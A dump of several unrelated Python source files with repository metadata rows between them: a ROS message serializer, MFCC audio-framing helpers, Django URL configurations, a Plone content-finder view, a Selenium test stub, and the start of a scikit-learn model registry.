except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.platform_info is None:
self.platform_info = rocon_std_msgs.msg.PlatformInfo()
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.platform_info.uri = str[start:end].decode('utf-8')
else:
self.platform_info.uri = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.platform_info.version = str[start:end].decode('utf-8')
else:
self.platform_info.version = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.platform_info.icon.resource_name = str[start:end].decode('utf-8')
else:
self.platform_info.icon.resource_name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.platform_info.icon.format = str[start:end].decode('utf-8')
else:
self.platform_info.icon.format = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
self.platform_info.icon.data = str[start:end]
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self.platform_info.uri
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.platform_info.version
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.platform_info.icon.resource_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.platform_info.icon.format
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.platform_info.icon.data
length = len(_x)
# - if encoded as a list instead, serialize as bytes instead of string
if type(_x) in [list, tuple]:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.platform_info is None:
self.platform_info = rocon_std_msgs.msg.PlatformInfo()
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.platform_info.uri = str[start:end].decode('utf-8')
else:
self.platform_info.uri = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.platform_info.version = str[start:end].decode('utf-8')
else:
self.platform_info.version = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.platform_info.icon.resource_name = str[start:end].decode('utf-8')
else:
self.platform_info.icon.resource_name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.platform_info.icon.format = str[start:end].decode('utf-8')
else:
self.platform_info.icon.format = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
self.platform_info.icon.data = str[start:end]
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
class GetPlatformInfo(object):
_type = 'rocon_std_msgs/GetPlatformInfo'
_md5sum = 'b7b34c89d857c757ff89bd8e49fa695f'
_request_class = GetPlatformInfoRequest
_response_class = GetPlatformInfoResponse
| [
"javier.diaz.palacios@gmail.com"
] | javier.diaz.palacios@gmail.com |
989640846f2923672b9f68b26cea48cd3cda4fa1 | f2f7ee6f43966a4741cfadf2c39f1ac0345df6cd | /voice_verification/src/extractors/MFCC/sigproc.py | 5c2d53dd676b47b9f1370dc9129480c6d61a2806 | [
"MIT"
] | permissive | ngocphucck/zalo-ai-challange-2020 | d38963187d417ff6a1f7a561646e363ddb0ad114 | ae454dc4f0a43eac342ddd366f5d6bd1ef88a6eb | refs/heads/main | 2023-07-27T00:27:22.660909 | 2021-09-12T15:23:29 | 2021-09-12T15:23:29 | 356,480,224 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,764 | py | import decimal
import numpy
import math
import logging
import matplotlib.pyplot as plt
from scipy.io import wavfile
def round_half_up(number):
return int(decimal.Decimal(number).quantize(decimal.Decimal('1'), rounding=decimal.ROUND_HALF_UP))
def rolling_window(a, window, step=1):
shape = a.shape[:-1] + (a.shape[-1] - window + 1, window)
strides = a.strides + (a.strides[-1],)
return numpy.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)[::step]
def frame_signal(signal, frame_len, frame_step, win_func=lambda x: numpy.ones((x,)), stride_trick=True):
signal_len = len(signal)
frame_len = int(round_half_up(frame_len))
frame_step = int(round_half_up(frame_step))
if signal_len <= frame_len:
num_frames = 1
else:
num_frames = 1 + int(math.ceil((1.0 * signal_len - frame_len) / frame_step))
pad_len = int((num_frames - 1) * frame_step + frame_len)
zeros = numpy.zeros((pad_len - signal_len,))
pad_signal = numpy.concatenate((signal, zeros))
if stride_trick:
win = win_func(frame_len)
frames = rolling_window(pad_signal, window=frame_len, step=frame_step)
else:
indices = numpy.tile(numpy.arange(0, frame_len), (num_frames, 1)) + numpy.tile(
numpy.arange(0, num_frames * frame_step, frame_step), (frame_len, 1)).T
indices = numpy.array(indices, dtype=numpy.int32)
frames = pad_signal[indices]
win = numpy.tile(win_func(frame_len), (num_frames, 1))
return frames * win
def de_frame_signal(frames, signal_len, frame_len, frame_step, win_func=lambda x: numpy.ones((x,))):
frame_len = round_half_up(frame_len)
frame_step = round_half_up(frame_step)
num_frames = numpy.shape(frames)[0]
assert numpy.shape(frames)[1] == frame_len
indices = numpy.tile(numpy.arange(0, frame_len), (num_frames, 1)) + numpy.tile(
numpy.arange(0, num_frames * frame_step, frame_step), (frame_len, 1)).T
indices = numpy.array(indices, dtype=numpy.int32)
pad_len = (num_frames - 1) * frame_step + frame_len
if signal_len <= 0:
signal_len = pad_len
rec_signal = numpy.zeros((pad_len,))
window_correction = numpy.zeros((pad_len,))
win = win_func(frame_len)
for i in range(0, num_frames):
window_correction[indices[i, :]] = window_correction[
indices[i, :]] + win + 1e-15 # add a little bit so it is never zero
rec_signal[indices[i, :]] = rec_signal[indices[i, :]] + frames[i, :]
rec_signal = rec_signal / window_correction
return rec_signal[0:signal_len]
def mag_spec(frames, fft_len):
if numpy.shape(frames)[1] > fft_len:
logging.warning(
'frame length (%d) is greater than FFT size (%d), frame will be truncated. Increase NFFT to avoid.',
numpy.shape(frames)[1], fft_len)
complex_spec = numpy.fft.rfft(frames, fft_len)
return numpy.absolute(complex_spec)
def power_spec(frames, fft_len):
return 1.0 / fft_len * numpy.square(mag_spec(frames, fft_len))
def log_power_spec(frames, fft_len, norm=1):
ps = power_spec(frames, fft_len)
ps[ps <= 1e-30] = 1e-30
lps = 10 * numpy.log10(ps)
if norm:
return lps - numpy.max(lps)
else:
return lps
def pre_emphasis(signal, coefficient=0.95):
return numpy.append(signal[0], signal[1:] - coefficient * signal[:-1])
if __name__ == '__main__':
wav_file = '/home/doanphu/Documents/Code/VND_project/zalo-ai-challange-2020/voice_verification/data/808-27.wav'
sampling_rate, signal = wavfile.read(wav_file)
print(signal)
frames = frame_signal(signal, frame_len=25, frame_step=15)
print(frames)
plt.plot(frames[0])
plt.show()
pass
| [
"doanphucck1801@gmail.com"
] | doanphucck1801@gmail.com |
836952d2e7adb7f62421d15b58c3c91383725b18 | 528585b79edbb5772321bcdeb69c14183d24437e | /driving_school/urls.py | 337da3de9a5f2953b288c29460a4b24772580ce7 | [] | no_license | vatraiadarsh/django-Driving-school | e42f82add756114b9694b0c71add84326ac9ad50 | b71bb8c7949eb9988fdb646ad22fa6c6f5d3c0bc | refs/heads/master | 2020-03-22T08:48:16.157702 | 2018-07-05T03:58:19 | 2018-07-05T03:58:19 | 139,791,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 756 | py | """driving_school URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| [
"vatraiadarsh@gmail.com"
] | vatraiadarsh@gmail.com |
69647f5f6f8dcffab725902e7d5549eb5c8703ee | 53d7cec8fd83072c4fa17200edf5254cc8c2792e | /collective/plonefinder/browser/finder.py | a200db4d81662ff15ecdd509dd437ff38b18542c | [] | no_license | collective/collective.plonefinder | aa95192e9083fcef4674bbfb9ff63bcb7effd6ac | c9a5026b7d1a7307e9ce71dc23aa78a51ceb5740 | refs/heads/master | 2023-08-11T03:31:43.016610 | 2023-02-20T15:58:06 | 2023-02-20T15:58:06 | 10,641,592 | 1 | 7 | null | 2022-10-23T06:25:35 | 2013-06-12T11:34:09 | JavaScript | UTF-8 | Python | false | false | 26,653 | py | # -*- coding: utf-8 -*-
# $Id$
"""Finder pop up control"""
from ZTUtils import make_query
from zope.interface import implementer
from Products.Five import BrowserView
from Acquisition import aq_base, aq_inner
from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
from Products.CMFCore.utils import getToolByName
from Products.CMFPlone.utils import getFSVersionTuple
from plone.app.layout.navigation.interfaces import INavigationRoot
try:
from Products.ATContentTypes.interface import IATTopic
HAS_AT = True
except ImportError:
HAS_AT = False
from collective.plonefinder.interfaces import IFinder
from collective.plonefinder.browser.interfaces import IFinderUploadCapable
from collective.plonefinder import siteMessageFactory as _
from collective.plonefinder.utils import pleaseDontCache
try:
from plone.app.contenttypes.interfaces import IImage
HAS_PAC = True
except ImportError:
HAS_PAC = False
def _quotestring(s):
return '"%s"' % s
def _quote_bad_chars(s):
bad_chars = ["(", ")"]
for char in bad_chars:
s = s.replace(char, _quotestring(char))
return s
def isPlone3():
return getFSVersionTuple()[0] == 3
def getPathClass(browsedpath, currentpath):
"""
if currentpath == browsedpath return ' currentitem'
if currentpath is parent of browsedpath return ' currentnode'
else return ''
"""
if currentpath==browsedpath:
return ' currentitem'
else:
browsedpathList = browsedpath.split('/')
currentpathList = currentpath.split('/')
if len(browsedpathList) > len(currentpathList):
isCurrentNode = True
for index, id in enumerate(currentpathList):
if id != browsedpathList[index]:
isCurrentNode = False
break
if isCurrentNode:
return ' currentnode'
return ''
def finderTopicsQueryCatalog(scope, catalog, **kw):
"""Redefine the queryCatlog method defined in AT Topics to allow a query
override with kw args and to return 0 results when there are no criteria
inside topic (other use cases are not interesting here)
"""
query = scope.buildQuery()
if query is None:
return []
else:
# Allow parameters to override existing criterias
query.update(kw)
return catalog(**query)
FORM_PARAMS = ('SearchableText',)
@implementer(IFinder)
class Finder(BrowserView):
"""Class for Plone Finder View
"""
template = ViewPageTemplateFile('finder.pt')
def __init__(self, context, request):
super(Finder, self).__init__(context, request)
portal_url = getToolByName(context, 'portal_url')
portal = portal_url.getPortalObject()
# dict to place persistent objects
self.data = {
'portal': portal,
'root': None,
'scope': None,
'catalog': getToolByName(portal, 'portal_catalog')
}
self.is_plone3 = isPlone3()
self.portal_url = portal_url()
self.portalpath = '/'.join(portal.getPhysicalPath())
self.breadcrumbs = []
# All these properties could be overloaded in a Finder's inherited class
self.findername = 'plone_finder'
#: Visible breadcrumbs in finder
self.showbreadcrumbs = True
self.scopetitle = ''
self.scopetype = ''
self.scopeiconclass = 'divicon'
#: Select multiple elements
self.multiselect = True
#: Closes the finder on selecting an item
self.forcecloseoninsert = 0
#: Browsing root path
self.rootpath = ''
self.browsedpath = ''
self.parentpath = ''
self.types = []
#: View of types in content panel of finder. 'file', 'image' or 'selection'
self.typeview = 'file'
self.typecss = 'list'
#: Enable browsing
self.browse = True
self.sort_on = 'getObjPositionInParent'
self.sort_order = ''
self.sort_inverse = 'ascending'
self.sort_request = False
self.sort_withcatalog = True
#: ???
self.displaywithoutquery = True
#: uids of items to be hidden (thus not selectable)
self.blacklist = []
self.addtoblacklist = []
self.removefromblacklist = []
#: Mapping of catalog query keyword arguments or None
self.query = None
# FIXME: We should use an interface instead (IATImage ?)
#: Portal types that may show image vignetes
self.imagestypes = ('Image', )
# FIXME: We should use an interface instead (IIcon ?)
#: Portal types that may have specific icons
self.filestypes = ('File',)
#: Type of returned value, may be 'uid' or 'url'
self.selectiontype = 'uid'
#: Do we enable selecting specific image size variants of IATImage items?
self.allowimagesizeselection = True
#: Id of the field that has this finder widget
self.fieldid = 'demofield'
#: Name of the field that has this finder widget
self.fieldname = 'demofield'
#: Type of the field that has this finder widget (FIXME: seems useless)
self.fieldtype = 'list'
#: True to show the finder in browser popup, Flase for an Ajax style overlay
self.ispopup = True
#: True to show anyway blacklisted items (but these are not selectable)
self.showblacklisted = True
#: True to display the search box
self.showsearchbox = True
#: True to display search results
self.searchsubmit = False
#: True to allow file upload through the finder
self.allowupload = True
#: True to display upload widget by default, only relevant if self.allowupload = True
self.openuploadwidgetdefault = False
#: True to allow creating new folders through the finder
self.allowaddfolder = False
#: Portal type built to hold object upload through finder UI
self.typeupload = ''
#: Portal type built when creating folder through finder UI
self.typefolder = ''
# Change this property
# to define your own methods (overload selectItem as example)
self.jsaddons = ''
# Change this property to define your own css
self.cssaddons = ''
def __call__(self):
"""Called on view being published
"""
context = aq_inner(self.context)
request = aq_inner(self.request)
session = request.get('SESSION', {})
pleaseDontCache(context, request)
# Updating attributes from request values
for name in (
'rootpath', 'browse', 'showbreadcrumbs', 'multiselect',
'forcecloseoninsert', 'types', 'typeupload', 'typefolder',
'typeview', 'displaywithoutquery', 'query', 'imagestypes',
'filestypes', 'selectiontype', 'allowimagesizeselection', 'fieldid',
'fieldname', 'fieldtype', 'ispopup', 'showblacklisted',
'searchsubmit', 'allowupload', 'allowaddfolder'
):
setattr(self, name, request.get(name, getattr(self, name)))
if not self.browse:
self.showbreadcrumbs = False
self.setScopeInfos(context, request, self.showbreadcrumbs)
if not self.multiselect:
self.forcecloseoninsert = 1
if self.typeview == 'image':
self.typecss = 'float'
if request.get('finder_sort_on'):
self.sort_on = request.get('finder_sort_on')
self.sort_order = request.get('sort_order', self.sort_order)
# sort_order could be empty or reverse, or ascending
if self.sort_order=='reverse':
self.sort_inverse = 'ascending'
elif self.sort_order=='ascending':
self.sort_inverse = 'reverse'
self.sort_request = True
if self.sort_on not in self.data['catalog'].indexes():
self.sort_withcatalog = False
# Use self.blacklist (or blacklist in session or request) to remove some
# uids from results
rblacklist = request.get('blacklist', self.blacklist)
sblacklist = session.get('blacklist', rblacklist)
if sblacklist and not rblacklist and not request.get('newsession', False):
self.blacklist = sblacklist
else:
self.blacklist = rblacklist
# Use self.addtoblacklist (or addtoblacklist in request) to add elements
# in blacklist
addtoblacklist = request.get('addtoblacklist', self.addtoblacklist)
for k in addtoblacklist:
if k not in self.blacklist:
self.blacklist.append(k)
# Use self.removefromblacklist (or removefromblacklist in request) to
# remove elements from blacklist
removefromblacklist = request.get('removefromblacklist', self.removefromblacklist)
for k in removefromblacklist:
if k in self.blacklist:
self.blacklist.remove(k)
# Put new blacklist in session
# FIXME: KISS
if session:
if request.get('emptyblacklist', False):
session.set('blacklist', [])
else:
session.set('blacklist', self.blacklist)
firstpassresults = self.finderResults()
if self.sort_request and not self.sort_withcatalog:
firstpassresults.sort(key=lambda k: k[self.sort_on])
if self.sort_order == 'reverse':
firstpassresults.reverse()
# remove blacklisted uids or just set it as blacklisted if needed
results = []
if self.selectiontype == 'uid':
for r in firstpassresults:
if r['uid'] not in self.blacklist or self.typeview=='selection':
results.append(r)
elif self.showblacklisted:
r['blacklisted'] = True
results.append(r)
self.results = results
self.folders = []
self.rootfolders = []
if self.browse:
self.folders = self.finderBrowsingResults()
if self.data['scope'] is self.data['root']:
self.rootfolders = self.folders
else:
self.rootfolders = self.finderNavBrowsingResults()
self.cleanrequest = self.cleanRequest()
# Upload disallowed if user do not have permission to Add portal content
# on main window context
if self.allowupload:
tool = getToolByName(context, "portal_membership")
if not(tool.checkPermission('Add portal content', self.data['scope'])):
self.allowupload = False
if not IFinderUploadCapable.providedBy(self.data['scope']):
self.allowupload = False
# Allowaddfolder disallowed if user do not have permission to add portal
# content on context disallowed also when context is not
# IFinderUploadCapable
# FIXME: This should require allowupload otherwise this has no sense
if self.allowaddfolder:
tool = getToolByName(context, "portal_membership")
if not(tool.checkPermission('Add portal content', self.data['scope'])):
self.allowaddfolder = False
if not IFinderUploadCapable.providedBy(self.data['scope']):
self.allowaddfolder = False
self.cleanrequest = self.cleanRequest()
return self.template()
def setScopeInfos(self, context, request, showbreadcrumbs):
"""Set scope and all infos related to scope
"""
browsedpath = request.get('browsedpath', self.browsedpath)
portal = self.data['portal']
# Find browser root and rootpath if undefined
if self.data['root'] is None:
self.data['root'] = root = aq_inner(
portal.restrictedTraverse(self.rootpath)
)
if not self.rootpath:
self.rootpath = '/'.join(root.getPhysicalPath())
# Find scope if undefined. By default scope = browsedpath or first
# parent folderish or context if context is a folder
scope = self.data['scope']
if scope is None:
if browsedpath:
self.data['scope'] = scope = aq_inner(portal.restrictedTraverse(browsedpath))
else:
folder = aq_inner(context)
if not bool(getattr(aq_base(folder), 'isPrincipiaFolderish', False)):
folder = aq_inner(folder.aq_parent)
while "portal_factory" in folder.getPhysicalPath():
folder = aq_inner(folder.aq_parent)
self.data['scope'] = scope = folder
self.scopetitle = scope.pretty_title_or_id()
self.scopetype = scopetype = scope.portal_type
self.scopeiconclass = 'contenttype-%s divicon' % scopetype.lower().replace(' ','-')
# set browsedpath and browsed_url
self.browsedpath = '/'.join(scope.getPhysicalPath())
self.browsed_url = scope.absolute_url()
if scope is not self.data['root']:
parentscope = aq_inner(scope.aq_parent)
self.parentpath = '/'.join(parentscope.getPhysicalPath())
# set breadcrumbs
# TODO: use self.data['catalog']
portal_membership = getToolByName(context, "portal_membership")
if showbreadcrumbs:
crumbs = []
item = scope
itempath = self.browsedpath
while itempath != self.rootpath:
crumb = {}
crumb['path'] = itempath
crumb['title'] = item.title_or_id()
crumb['show_link'] = portal_membership.checkPermission('View', item)
crumbs.append(crumb)
item = aq_inner(item.aq_parent)
itempath = '/'.join(item.getPhysicalPath())
crumbs.reverse()
self.breadcrumbs = crumbs
def finderQuery(self, topicQuery=None):
"""Query for results depending on some params
"""
request = self.request
if self.query:
return self.query
elif self.typeview == 'selection':
return {'uid': self.blacklist}
elif self.displaywithoutquery or self.searchsubmit:
query = {}
path = {}
if not self.searchsubmit:
path['depth'] = 1
path['query'] = self.browsedpath
query['path'] = path
sort_index = self.sort_on
if self.sort_withcatalog:
query['sort_on'] = sort_index
query['sort_order'] = self.sort_order
if self.types:
query['portal_type'] = self.types
if self.searchsubmit:
# TODO: use a dynamic form with different possible searchform fields
q = request.get('SearchableText', '')
if q:
for char in '?-+*':
q = q.replace(char, ' ')
r=q.split()
r = " AND ".join(r)
searchterms = _quote_bad_chars(r)+'*'
query['SearchableText'] = searchterms
return query
def finderNavBrowsingResults(self, querypath=''):
"""Left navigation subtree results
"""
if not querypath:
querypath = self.rootpath
return self.finderBrowsingResults(querypath=querypath, isnav=True)
def finderBrowsingQuery(self, querypath=None):
"""Return query for folderishs to browse
"""
if self.browse:
path = {'depth': 1}
if querypath:
path['query'] = querypath
else:
path['query'] = self.browsedpath
return {
'path': path,
'is_folderish': True,
'sort_on': 'getObjPositionInParent'
}
def finderBrowsingResults(self, querypath=None, isnav=False):
"""Return results to browse method used for finder left navigation and
navigation inside main window
"""
cat = self.data['catalog']
query = self.finderBrowsingQuery(querypath)
brains = cat(**query)
results = []
for b in brains:
r = {}
r['uid'] = b.UID
r['url'] = b.getURL()
r['title'] = b.pretty_title_or_id()
r['jstitle'] = r['title'].replace("\x27", "\x5C\x27")
r['description'] = b.Description
r['iconclass'] = 'contenttype-%s divicon' % b.portal_type.lower().replace(' ','-')
r['type'] = b.portal_type
r['path'] = b.getPath()
r['state_class'] = 'state-%s' % b.review_state
r['path_class'] = ''
r['sub_folders'] = []
if isnav:
r['path_class'] = getPathClass(self.browsedpath, r['path'])
# if browser path is current or current node
# search for subfolders
if r['path_class']:
r['sub_folders'] = self.finderNavBrowsingResults(querypath=r['path'])
results.append(r)
return results
def finderResults(self):
"""Return results to select
"""
cat = self.data['catalog']
scope = self.data['scope']
if HAS_AT and IATTopic.providedBy(scope):
supQuery = self.finderQuery()
if supQuery.has_key('path'):
del supQuery['path']
brains = finderTopicsQueryCatalog(scope, cat, **supQuery)
else:
query = self.finderQuery()
brains = cat(**query)
results = []
for b in brains:
title_or_id = b.pretty_title_or_id()
r = {
'uid': b.UID,
'url': b.getURL(),
'path': b.getPath(),
'title': title_or_id,
'jstitle': title_or_id.replace("\x27", "\x5C\x27"),
'description':b.Description,
'state_class': 'state-%s' % b.review_state,
'is_folderish': b.is_folderish or False,
'size': b.getObjSize,
'type': b.portal_type,
'blacklisted': False,
'created': b.created,
'actions_menu': {}
}
if r['type'] in self.imagestypes:
o = b.getObject()
imageInfos = self.getImageInfos(o)
orientation = imageInfos[0]
width = imageInfos[1]
height = imageInfos[2]
if width and height:
# FIXME: This should go in config.py
min, max = 70, 100
if orientation == 'portrait':
ratio = float(width)/float(height)
if height > max:
width = int(ratio *max)
height = max
if width > min:
width = min
height = int(min/ratio)
else:
ratio = float(height)/float(width)
if width > max:
height = int(ratio *max)
width = max
if height > min:
height = min
width = int(min/ratio)
thumb_sizes = self.getThumbSizes()
# define thumb icon and preview urls for display
thumb = icon = '%s/image' % r['url']
preview = '%s/image?isImage=1' % r['url']
for ts in thumb_sizes:
if ts[1] >= width and ts[2] >= height:
thumb = '%s/@@images/image/%s' % (r['url'], ts[0])
break
for ts in thumb_sizes:
if ts[1] >= 16 and ts[2] >= 16:
icon = '%s/@@images/image/%s' % (r['url'], ts[0])
break
for ts in thumb_sizes:
if ts[1] >= 400 and ts[2] >= 400:
preview = '%s/@@images/image/%s?isImage=1' % (r['url'], ts[0])
break
# images sizes actions menu
thumb_sizes.extend([('full', width, height, _('Full size'), '/@@images/image')])
if self.allowimagesizeselection:
r['actions_menu']['choose_image_size'] = {
'label': _(u'Choose image size'),
'actions': thumb_sizes
}
r.update({
'is_image': True,
'preview_url': preview,
'url': '%s/image' % r['url'],
'container_class': 'imageContainer',
'style': 'width: %ipx; height: %ipx' % (width, height)
})
else:
orientation = 'small'
thumb = icon = None
r.update({
'iconclass': ('contenttype-%s divicon' %
b.portal_type.lower().replace(' ','-')),
'is_image': False,
'container_class': 'fileContainer',
'style': ''
})
else:
# Not an image type
orientation = 'small'
r['style'] = ''
if b.portal_type in self.filestypes:
o = b.getObject()
icon_base = o.getIcon()
if icon_base:
r['style'] = 'background-image: url(./%s)' % icon_base
r['iconclass'] = 'contenttype-%s divicon' % b.portal_type.lower().replace(' ','-')
thumb = icon = None
r['is_image'] = False
r['container_class'] = 'fileContainer'
if self.typeview == 'image':
r['orientation_class'] = orientation
r['thumb'] = thumb
else:
r['orientation_class'] = '%s_icon' % orientation
r['thumb'] = icon
if r['size']:
r['real_size'] = float(r['size'].split(' ')[0])
else:
r['real_size'] = 0
results.append(r)
return results
def getThumbSizes(self):
"""Return an ordered list of thumb sizes taken from portal properties
imaging properties when exists list of tuples [(label, width, height,
thumb_label, thumb_extension), ...]
FIXME: This is too much associated with standard ATImage. We should proceed
with views/adapters
"""
context = aq_inner(self.context)
pprops = getToolByName(context, 'portal_properties')
if hasattr(pprops, 'imaging_properties'):
imaging_properties = pprops.imaging_properties
thumb_sizes_props = imaging_properties.getProperty('allowed_sizes')
thumb_sizes = []
for prop in thumb_sizes_props:
propInfo = prop.split(' ')
thumb_name = propInfo[0]
thumb_width = int(propInfo[1].split(':')[0])
thumb_height = int(propInfo[1].split(':')[1])
thumb_label = "%s : %ipx*%ipx" % (_(thumb_name.capitalize()), thumb_width,
thumb_height)
thumb_extension = "/@@images/image/%s" % thumb_name
thumb_sizes.append((thumb_name, thumb_width, thumb_height, thumb_label,
thumb_extension))
thumb_sizes.sort(key=lambda ts: ts[1])
return thumb_sizes
return [
('listing', 16, 16, '%s : 16px*16px' % _('Listing'), '/@@images/image/listing'),
('icon', 32, 32, '%s : 32px*32px' % _('Icon'), '/@@images/image/icon'),
('tile', 64, 64, '%s : 64px*64px' % _('Tile'), '/@@images/image/tile'),
('thumb', 128, 128, '%s : 128px*128px' % _('Thumb'), '/@@images/image/thumb'),
('mini', 200, 200, '%s : 200px*200px' % _('Mini'), '/@@images/image/mini'),
('preview', 400, 400, '%s : 400px*400px' % _('Preview'), '/@@images/image/preview'),
('large', 768, 768, '%s : 768px*768px' % _('Large'), '/@@images/image/large')
]
def getImageSize(self, image_obj):
if HAS_PAC:
if (
IImage.providedBy(image_obj) or IImage.providedBy(image_obj)
):
return image_obj.image.getImageSize()
field = image_obj.getField('image')
if field.type in ("blob", "file", "image"):
return field.getSize(image_obj)
elif field.type == "reference":
return field.get(image_obj).getSize()
else:
raise ValueError("image field type unknown")
def getImageInfos(self, image_obj):
"""Return orientation width and height
# FIXME: This is too much associated to ATImage stuffs.
We should proceed with adapters
# FIXME: This should be a function, not a method
"""
im_width, im_height = self.getImageSize(image_obj)
if im_height >= im_width:
orientation = 'portrait'
else:
orientation = 'landscape'
return orientation, im_width, im_height
def cleanRequest(self):
"""Remove some params in request and store some of them for next request
FIXME: rename this 'cleanQuery' and make this a function that takes the
request as parameter
"""
request = self.request
ignored = ('blacklist', 'addtoblacklist', 'removefromblacklist', 'searchsubmit',
'newsession', 'emptyblacklist', 'b_start', 'finder_sort_on',
'sort_order')
dictRequest = {}
for param, value in request.form.items():
if (value is not None and
(param not in ignored) and
(param not in FORM_PARAMS)):
dictRequest[param] = value
return dictRequest
def cleanQuery(self):
"""Make a query_string with clean Request
"""
return make_query(self.cleanrequest)
| [
"gotcha@bubblenet.be"
] | gotcha@bubblenet.be |
3a56b6f97c3d4e588816a71be172663550a6088c | c6ef2c75b9015ecc1ddb8a47f2ceeb96c83750d1 | /project10/f10.py | c57f30573d8c22ec098752b3bbfa1e50617d90cf | [] | no_license | feng1234-debug/pn | 7b5202894868efef2ab1e7e05d0f51e38f7a13c5 | c0250c516e1cc904b6e5f8bf06178d558c08b9b9 | refs/heads/master | 2022-12-03T22:24:33.617251 | 2020-07-31T12:00:42 | 2020-07-31T12:00:42 | 284,025,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 237 | py | #coding=utf-8
import unittest
from project10.init import *
class BaiduSo(Init):
def test_baidu_news(self):
self.driver.find_element_by_id('kw').send_keys('webdriver')
if __name__=='__main__':
unittest.main(verbosity=2) | [
"1906463435@qq.com"
] | 1906463435@qq.com |
5c967d1261382dabf68373611c9c6a88a9637416 | 5c94e4df517745a564250f5a066d1c05dcf02c24 | /car/urls.py | 859568ed746d4f78c16e1f1d97d30b3408f91568 | [] | no_license | aysenurozbay/Airport_Transfer_with_Python_Django | e4cd4310f0121f5ecf6ca97f33c466de8ff6bc2a | e5a31d59ec6e968e996ee75542bd4891e53c466a | refs/heads/master | 2023-06-05T20:43:19.860280 | 2021-07-02T12:06:51 | 2021-07-02T12:06:51 | 347,430,605 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 471 | py | from django.urls import path
from . import views
urlpatterns = [
# ex: /home/
path('', views.index, name='index'),
path('addcomment/<int:id>', views.addcomment, name='addcomment'),
# ex: /home/5/
# path('<int:question_id>/', views.detail, name='detail'),
# # ex: /home/5/results/
# path('<int:question_id>/results/', views.results, name='results'),
# # ex: /home/5/vote/
# path('<int:question_id>/vote/', views.vote, name='vote'),
] | [
"aysenurozbay1004@gmail.com"
] | aysenurozbay1004@gmail.com |
0d938df3b03127a2fd218275a8f7468023f1eeab | 990f80e42ea5a02406e8dd9fb5a4ade34b666aaf | /src/model.py | 4e86aebdfeddefe05f803662aef5bf05bd0afd64 | [
"Apache-2.0"
] | permissive | kim0215/xai-bench | 09a3f54d589dea92dd4072b59d0ce0cc5529f964 | 5bdccf5aeedaa743d398b2a028d189f72a83b3d3 | refs/heads/main | 2023-06-16T00:59:03.644563 | 2021-07-06T09:55:37 | 2021-07-06T09:55:37 | 383,399,139 | 0 | 0 | Apache-2.0 | 2021-07-06T08:38:39 | 2021-07-06T08:38:39 | null | UTF-8 | Python | false | false | 1,097 | py | from sklearn.linear_model import LinearRegression
from sklearn.neural_network import MLPRegressor, MLPClassifier
from sklearn.tree import DecisionTreeRegressor, DecisionTreeClassifier
valid_models = {
"regression": {
"dataset": lambda : "dataset",
"lr": LinearRegression,
"mlp": MLPRegressor,
"dtree": DecisionTreeRegressor,
},
"classification": {
"dataset": lambda : "dataset",
